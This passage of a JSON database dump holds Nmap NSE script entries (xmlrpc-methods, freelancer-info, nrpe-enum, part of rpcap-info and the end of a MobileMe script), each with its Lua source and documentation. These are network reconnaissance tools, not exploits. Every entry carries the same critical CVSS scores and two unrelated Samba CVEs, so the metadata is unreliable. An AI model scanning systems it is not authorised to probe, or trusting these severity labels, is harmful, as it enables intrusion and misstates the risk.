mm = mobileme.Helper:new(arg_username, arg_password)\n local status, devices = mm:getDevices()\n\n if ( not(status) ) then\n return fail(\"Failed to get devices\")\n end\n\n if ( status and arg_deviceindex <= #devices ) then\n local status = mm:sendMessage( devices[arg_deviceindex].id, arg_subject, arg_message, arg_sound)\n if ( status ) then\n return (\"\\n Message was successfully sent to \\\"%s\\\"\"):format(decodeString(devices[arg_deviceindex].name or \"\"))\n else\n return \"\\n Failed to send message\"\n end\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:32:13", "description": "Performs XMLRPC Introspection via the system.listMethods method. \n\nIf the verbosity is > 1 then the script fetches the response of system.methodHelp for each method returned by listMethods.\n\n## Script Arguments \n\n#### xmlrpc-methods.url \n\nThe URI path to request.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sV -sC <target>\n\n## Script Output \n \n \n | xmlrpc-methods:\n | Supported Methods:\n | list\n | system.listMethods\n | system.methodHelp\n |_ system.methodSignature\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [slaxml](<../lib/slaxml.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [strbuf](<../lib/strbuf.html>)\n * [string](<>)\n * [table](<>)\n * [tableaux](<../lib/tableaux.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-08-17T19:03:34", "type": "nmap", "title": "xmlrpc-methods NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-11-06T15:07:01", "id": "NMAP:XMLRPC-METHODS.NSE", "href": "https://nmap.org/nsedoc/scripts/xmlrpc-methods.html", "sourceData": "local http = require \"http\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal slaxml = require \"slaxml\"\nlocal stdnse = require \"stdnse\"\nlocal strbuf = require \"strbuf\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal tableaux = require \"tableaux\"\n\ndescription = [[\nPerforms XMLRPC Introspection via the system.listMethods method.\n\nIf the verbosity is > 1 then the script fetches the response\nof system.methodHelp for each method returned by listMethods.\n]]\n\n---\n-- @args xmlrpc-methods.url The URI path to request.\n--\n-- @output\n-- | xmlrpc-methods:\n-- | Supported Methods:\n-- | list\n-- | system.listMethods\n-- | system.methodHelp\n-- |_ system.methodSignature\n--\n-- @xmloutput\n-- <table key=\"Supported Methods\">\n-- <elem>list</elem>\n-- <elem>system.listMethods</elem>\n-- <elem>system.methodHelp</elem>\n-- <elem>system.methodSignature</elem>\n-- </table>\n\nauthor = \"Gyanendra Mishra\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"default\", \"safe\", \"discovery\"}\n\nportrule = shortport.http\n\nlocal function set_80_columns(t)\n local buffer = strbuf.new()\n for method, description in pairs(t) do\n buffer = (buffer .. string.format(\" %s:\\n\\n\", method))\n local line, ll = {}, 0\n local add_word = function(word)\n if #word + ll + 1 < 78 then\n table.insert(line, word)\n ll = ll + #word + 1\n else\n buffer = buffer .. table.concat(line, \" \") .. \"\\n\"\n ll = #word + 1\n line = {word}\n end\n end\n string.gsub(description, \"(%S+)\", add_word)\n buffer = buffer .. table.concat(line, \" \") .. \"\\n\\n\"\n end\n return \"\\n\" .. strbuf.dump(buffer)\nend\n\naction = function(host, port)\n\n local url = stdnse.get_script_args(SCRIPT_NAME .. \".url\") or \"/\"\n local data = '<methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>'\n local response = http.post(host, port, url, {header = {[\"Content-Type\"] = \"application/x-www-form-urlencoded\"}}, nil, data )\n if not (response and response.status and response.body) then\n stdnse.debug1(\"HTTP POST failed\")\n return nil\n end\n local output = stdnse.output_table()\n local parser = slaxml.parser:new()\n\n local under_80 = {\n __tostring = set_80_columns\n }\n\n if response.status == 200 and response.body:find(\"<value><string>system.listMethods</string></value>\", nil, true) then\n\n parser._call = {startElement = function(name)\n parser._call.text = name == \"string\" and function(content) output[\"Supported Methods\"] = output[\"Supported Methods\"] or {} table.insert(output[\"Supported Methods\"], content) end end,\n closeElement = function(name) parser._call.text = function() return nil end end\n }\n parser:parseSAX(response.body, {stripWhitespace=true})\n\n if nmap.verbosity() > 1 and tableaux.contains(output[\"Supported Methods\"], \"system.methodHelp\") then\n for i, method in ipairs(output[\"Supported Methods\"]) do\n data = '<methodCall> <methodName>system.methodHelp</methodName> <params> <param><value> <string>' .. method .. '</string> </value></param> </params> </methodCall>'\n response = http.post(host, port, url, {header = {[\"Content-Type\"] = \"application/x-www-form-urlencoded\"}}, nil, data)\n if response and response.status == 200 then\n parser._call.startElement = function(name)\n parser._call.text = name == \"string\" and function(content)\n content = parser.unescape(content)\n output[\"Supported Methods\"][i] = nil\n output[\"Supported Methods\"][method] = content\n end\n end\n parser:parseSAX(response.body, {stripWhitespace=true})\n end\n -- useful in cases when the output returned by the above request is empty\n -- or the <value><string></string></value> has no text in the string\n -- element.\n if output[\"Supported Methods\"][i] then\n output[\"Supported Methods\"][i] = nil\n output[\"Supported Methods\"][method] = \"Empty system.methodHelp output.\"\n end\n end\n setmetatable(output[\"Supported Methods\"], under_80)\n end\n return output\n elseif response.body:find(\"<name>faultCode</name>\", nil, true) then\n output.error = \"XMLRPC instance doesn't support introspection.\"\n return output, output.error\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:20", "description": "Detects the Freelancer game server (FLServer.exe) service by sending a status query UDP probe. \n\nWhen run as a version detection script (`-sV`), the script will report on the server name, current number of players, maximum number of players, and whether it has a password set. When run explicitly (`--script freelancer-info`), the script will additionally report on the server description, whether players can harm other players, and whether new players are allowed. \n\nSee <http://sourceforge.net/projects/gameq/> (relevant files: games.ini, packets.ini, freelancer.php)\n\n## Example Usage \n \n \n nmap -sU -sV -p 2302 <target>\n nmap -sU -p 2302 --script=freelancer-info <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON VERSION\n 2302/udp open freelancer udp-response Freelancer (name: Discovery Freelancer RP 24/7; players: 152/225; password: no)\n | freelancer-info:\n | server name: Discovery Freelancer RP 24/7\n | server description: This is the official discovery freelancer RP server. To know more about the server, please visit www.discoverygc.com\n | players: 152\n | max. players: 225\n | password: no\n | allow players to harm other players: yes\n |_ allow new players: yes\n \n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2013-11-20T04:31:31", "type": "nmap", "title": "freelancer-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-13T14:58:56", "id": "NMAP:FREELANCER-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/freelancer-info.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nDetects the Freelancer game server (FLServer.exe) service by sending a\nstatus query UDP probe.\n\nWhen run as a version detection script (<code>-sV</code>), the script\nwill report on the server name, current number of players, maximum\nnumber of players, and whether it has a password set. When run\nexplicitly (<code>--script freelancer-info</code>), the script will\nadditionally report on the server description, whether players can harm\nother players, and whether new players are allowed.\n\nSee http://sourceforge.net/projects/gameq/\n(relevant files: games.ini, packets.ini, freelancer.php)\n]]\n\n---\n-- @usage\n-- nmap -sU -sV -p 2302 <target>\n-- nmap -sU -p 2302 --script=freelancer-info <target>\n-- @output\n-- PORT STATE SERVICE REASON VERSION\n-- 2302/udp open freelancer udp-response Freelancer (name: Discovery Freelancer RP 24/7; players: 152/225; password: no)\n-- | freelancer-info:\n-- | server name: Discovery Freelancer RP 24/7\n-- | server description: This is the official discovery freelancer RP server. To know more about the server, please visit www.discoverygc.com\n-- | players: 152\n-- | max. players: 225\n-- | password: no\n-- | allow players to harm other players: yes\n-- |_ allow new players: yes\n--\n-- @xmloutput\n-- <elem key=\"server name\">Discovery Freelancer RP 24/7</elem>\n-- <elem key=\"server description\">This is the official discovery freelancer RP server. To know more about the server, please visit www.discoverygc.com</elem>\n-- <elem key=\"players\">152</elem>\n-- <elem key=\"max. players\">225</elem>\n-- <elem key=\"password\">no</elem>\n-- <elem key=\"allow players to harm other players\">yes</elem>\n-- <elem key=\"allow new players\">yes</elem>\n\nauthor = \"Marin Mar\u017ei\u0107\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"default\", \"discovery\", \"safe\", \"version\" }\n\nportrule = shortport.version_port_or_service({2302}, \"freelancer\", \"udp\")\n\naction = function(host, port)\n local status, data = comm.exchange(host, port,\n \"\\x00\\x02\\xf1\\x26\\x01\\x26\\xf0\\x90\\xa6\\xf0\\x26\\x57\\x4e\\xac\\xa0\\xec\\xf8\\x68\\xe4\\x8d\\x21\",\n { timeout = 3000 })\n if not status then\n return\n end\n\n -- port is open\n nmap.set_port_state(host, port, \"open\")\n\n local passwordbyte, maxplayers, numplayers, name, pvpallow, newplayersallow, description =\n string.match(data, \"^\\x00\\x03\\xf1\\x26............(.)...(.)...(.)...................................................................(.*)\\0\\0(.):(.):.*:.*:.*:(.*)\\0\\0$\")\n if not passwordbyte then\n return\n end\n\n local o = stdnse.output_table()\n\n o[\"server name\"] = string.gsub(name, \"[^%g%s]\", \"\")\n o[\"server description\"] = string.gsub(description, \"[^%g%s]\", \"\")\n o[\"players\"] = numplayers:byte(1) - 1\n o[\"max. players\"] = maxplayers:byte(1) - 1\n\n passwordbyte = passwordbyte:byte(1)\n if passwordbyte & 128 ~= 0 then\n o[\"password\"] = \"yes\"\n else\n o[\"password\"] = \"no\"\n end\n\n o[\"allow players to harm other players\"] = \"n/a\"\n if pvpallow == \"1\" then\n o[\"allow players to harm other players\"] = \"yes\"\n elseif pvpallow == \"0\" then\n o[\"allow players to harm other players\"] = \"no\"\n end\n\n o[\"allow new players\"] = \"n/a\"\n if newplayersallow == \"1\" then\n o[\"allow new players\"] = \"yes\"\n elseif newplayersallow == \"0\" then\n o[\"allow new players\"] = \"no\"\n end\n\n port.version.name = \"freelancer\"\n port.version.name_confidence = 10\n port.version.product = \"Freelancer\"\n port.version.extrainfo = \"name: \" .. o[\"server name\"] .. \"; players: \" ..\n o[\"players\"] .. \"/\" .. o[\"max. players\"] .. \"; password: \" .. o[\"password\"]\n\n nmap.set_port_version(host, port, \"hardmatched\")\n\n return o\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:39:44", "description": "Queries Nagios Remote Plugin Executor (NRPE) daemons to obtain information such as load averages, process counts, logged in user information, etc. \n\nThis script attempts to execute the stock list of commands that are enabled. User-supplied arguments are not supported.\n\n## Script Arguments \n\n#### nrpe-enum.cmds \n\nA colon-separated list of commands to be executed.\n\n## Example Usage \n \n \n nmap --script nrpe-enum -p 5666 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 5666/tcp open nrpe syn-ack\n | nrpe-enum:\n | Command State Response\n | check_hda1 CRITICAL NRPE: Command 'check_hda1' not defined\n | check_load OK OK - load average: 1.00, 1.00, 1.00|load1=1.000;15.000;30.000;0; load5=1.000;10.000;25.000;0; load15=1.000;5.000;20.000;0;\n | check_total_procs OK PROCS OK: 5 processes\n | check_users WARNING USERS WARNING - 2 users currently logged in |users=2;0;10;0\n |_check_zombie_procs OK PROCS OK: 0 processes with STATE = Z\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n * [tab](<../lib/tab.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-01-09T03:43:41", "type": "nmap", "title": "nrpe-enum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:NRPE-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/nrpe-enum.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\nlocal tab = require \"tab\"\n\n-- -*- mode: lua -*-\n-- vim: set filetype=lua :\n\ndescription = [[\nQueries Nagios Remote Plugin Executor (NRPE) daemons to obtain information such\nas load averages, process counts, logged in user information, etc.\n\nThis script attempts to execute the stock list of commands that are\nenabled. User-supplied arguments are not supported.\n]]\n\n---\n-- @usage\n-- nmap --script nrpe-enum -p 5666 <host>\n--\n-- @args nrpe-enum.cmds A colon-separated list of commands to be executed.\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 5666/tcp open nrpe syn-ack\n-- | nrpe-enum:\n-- | Command State Response\n-- | check_hda1 CRITICAL NRPE: Command 'check_hda1' not defined\n-- | check_load OK OK - load average: 1.00, 1.00, 1.00|load1=1.000;15.000;30.000;0; load5=1.000;10.000;25.000;0; load15=1.000;5.000;20.000;0;\n-- | check_total_procs OK PROCS OK: 5 processes\n-- | check_users WARNING USERS WARNING - 2 users currently logged in |users=2;0;10;0\n-- |_check_zombie_procs OK PROCS OK: 0 processes with STATE = Z\n\nauthor = \"Mak Kolybabi\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\"}\n\n\nlocal NRPE_PROTOCOLS = {\n \"ssl\",\n \"tcp\"\n}\n\nlocal NRPE_STATES = {\n [0] = \"OK\",\n [1] = \"WARNING\",\n [2] =\"CRITICAL\",\n [3] = \"UNKNOWN\"\n}\n\nlocal NRPE_COMMANDS = {\n \"check_hda1\",\n \"check_load\",\n \"check_total_procs\",\n \"check_users\",\n \"check_zombie_procs\"\n}\n\nlocal CRC32_CONSTANTS = {\n 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F,\n 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988,\n 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91, 0x1DB71064, 0x6AB020F2,\n 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,\n 0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,\n 0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172,\n 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B, 0x35B5A8FA, 0x42B2986C,\n 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,\n 0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423,\n 0xCFBA9599, 0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,\n 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190, 0x01DB7106,\n 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,\n 0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D,\n 0x91646C97, 0xE6635C01, 0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E,\n 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,\n 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,\n 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7,\n 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0,\n 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA,\n 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,\n 0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81,\n 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A,\n 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683, 0xE3630B12, 0x94643B84,\n 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,\n 0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,\n 0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC,\n 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5, 0xD6D6A3E8, 0xA1D1937E,\n 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,\n 0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55,\n 0x316E8EEF, 0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,\n 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE, 0xB2BD0B28,\n 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,\n 0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F,\n 0x72076785, 0x05005713, 0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38,\n 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,\n 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,\n 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69,\n 0x616BFFD3, 0x166CCF45, 0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2,\n 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC,\n 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,\n 0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693,\n 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94,\n 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D\n}\n\nlocal crc32 = function(s)\n local crc = 0xFFFFFFFF\n for i = 1, #s do\n local p4 = (crc ~ s:byte(i)) & 0xff\n local p5 = CRC32_CONSTANTS[p4 + 1]\n crc = p5 ~ (crc >> 8)\n end\n\n return crc ~ 0xFFFFFFFF\nend\n\nlocal nrpe_open = function(host, port)\n for _, proto in pairs(NRPE_PROTOCOLS) do\n local sock = nmap.new_socket()\n sock:set_timeout(2000)\n local status, err = sock:connect(host, port, proto)\n if status then\n NRPE_PROTOCOLS = {proto}\n return true, sock\n end\n\n stdnse.debug2(\"Can't connect using %s: %s\", proto, err)\n sock:close()\n end\n\n return false, nil\nend\n\nlocal nrpe_write = function(cmd)\n -- Create request packet, before checksum.\n local pkt = string.pack(\">I2 I2 I4 I2\",\n 2,\n 1,\n 0,\n 0)\n .. cmd\n .. string.rep(\"\\0\", 1024 - #cmd)\n .. \"\\0\\0\"\n\n -- Calculate the checksum, and insert it into the packet.\n pkt = pkt:sub(1,4) .. string.pack(\">I4\", crc32(pkt)) .. pkt:sub(9)\n\n return pkt\nend\n\nlocal nrpe_read = function(pkt)\n local result = {}\n\n -- Parse packet.\n result.version,\n result.type,\n result.crc32,\n result.state,\n result.data = string.unpack(\">I2 I2 I4 I2 z\", pkt)\n\n return result\nend\n\nlocal nrpe_check = function(host, port, cmd)\n -- Create connection.\n local status, sock = nrpe_open(host, port)\n if not status then\n return false, nil\n end\n\n -- Send query.\n local status, err = sock:send(nrpe_write(cmd))\n if not status then\n stdnse.debug1(\"Failed to send NRPE query for command %s: %s\", cmd, err)\n sock:close()\n return false, nil\n end\n\n -- Receive response.\n local status, resp = sock:receive()\n if not status then\n stdnse.debug1(\"Can't read NRPE response: %s\", resp)\n sock:close()\n return false, nil\n end\n\n sock:close()\n\n return true, nrpe_read(resp)\nend\n\nportrule = shortport.port_or_service(5666, \"nrpe\")\n\naction = function(host, port)\n -- Get script arguments.\n local cmds = stdnse.get_script_args(\"nrpe-enum.cmds\")\n if cmds then\n cmds = stringaux.strsplit(\":\", cmds)\n else\n cmds = NRPE_COMMANDS\n end\n\n -- Create results table.\n local results = tab.new()\n tab.addrow(\n results,\n \"Command\",\n \"State\",\n \"Response\"\n )\n\n -- Try each NRPE command, and collect the results.\n for _, cmd in pairs(cmds) do\n local status, result = nrpe_check(host, port, cmd)\n if status then\n tab.addrow(\n results,\n cmd,\n NRPE_STATES[result.state],\n result.data\n )\n end\n end\n\n -- If no queries generated responses, don't output anything.\n if #results == 1 then\n return\n end\n\n -- Record service description.\n port.version.name = \"nrpe\"\n port.version.product = \"Nagios Remote Plugin Executor\"\n nmap.set_port_version(host, port)\n\n -- Format table, without trailing newline.\n results = tab.dump(results)\n results = results:sub(1, #results - 1)\n\n return \"\\n\" .. results\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:36:15", "description": "Connects to the rpcap service (provides remote sniffing capabilities through WinPcap) and retrieves interface information. The service can either be setup to require authentication or not and also supports IP restrictions.\n\n### See also:\n\n * [ rpcap-brute.nse ](<../scripts/rpcap-brute.html>)\n\n## Script Arguments \n\n#### creds.rpcap \n\nusername:password to use for authentication\n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 2002 <ip> --script rpcap-info\n nmap -p 2002 <ip> --script rpcap-info --script-args=\"creds.rpcap='administrator:foobar'\"\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 2002/tcp open rpcap syn-ack\n | rpcap-info:\n | \\Device\\NPF_{0D5D1364-1F1F-4892-8AC3-B838258F9BB8}\n | Intel(R) PRO/1000 MT Desktop Adapter\n | Addresses\n | fe80:0:0:0:aabb:ccdd:eeff:0011\n | 192.168.1.127/24\n | \\Device\\NPF_{D5EAD105-B0BA-4D38-ACB4-6E95512BC228}\n | Hamachi Virtual Network Interface Driver\n | Addresses\n |_ fe80:0:0:0:aabb:ccdd:eeff:0022\n \n\n## Requires \n\n * [creds](<../lib/creds.html>)\n * [nmap](<../lib/nmap.html>)\n * [rpcap](<../lib/rpcap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-03-02T12:39:18", "type": "nmap", "title": "rpcap-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-01-14T04:16:27", "id": "NMAP:RPCAP-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/rpcap-info.html", "sourceData": "local creds = require \"creds\"\nlocal nmap = require \"nmap\"\nlocal rpcap = require \"rpcap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nConnects to the rpcap service (provides remote sniffing capabilities\nthrough WinPcap) and retrieves interface information. The service can either be\nsetup to require authentication or not and also supports IP restrictions.\n]]\n\n---\n-- @usage\n-- nmap -p 2002 <ip> --script rpcap-info\n-- nmap -p 2002 <ip> --script rpcap-info --script-args=\"creds.rpcap='administrator:foobar'\"\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 2002/tcp open rpcap syn-ack\n-- | rpcap-info:\n-- | \\Device\\NPF_{0D5D1364-1F1F-4892-8AC3-B838258F9BB8}\n-- | Intel(R) PRO/1000 MT Desktop Adapter\n-- | Addresses\n-- | fe80:0:0:0:aabb:ccdd:eeff:0011\n-- | 192.168.1.127/24\n-- | \\Device\\NPF_{D5EAD105-B0BA-4D38-ACB4-6E95512BC228}\n-- | Hamachi Virtual Network Interface Driver\n-- | Addresses\n-- |_ fe80:0:0:0:aabb:ccdd:eeff:0022\n--\n-- @args creds.rpcap username:password to use for authentication\n--\n-- @see rpcap-brute.nse\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\ndependencies = {\"rpcap-brute\"}\n\n\nportrule = shortport.port_or_service(2002, \"rpcap\", \"tcp\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\nlocal function getInfo(host, port, username, password)\n\n local helper = rpcap.Helper:new(host, port)\n local 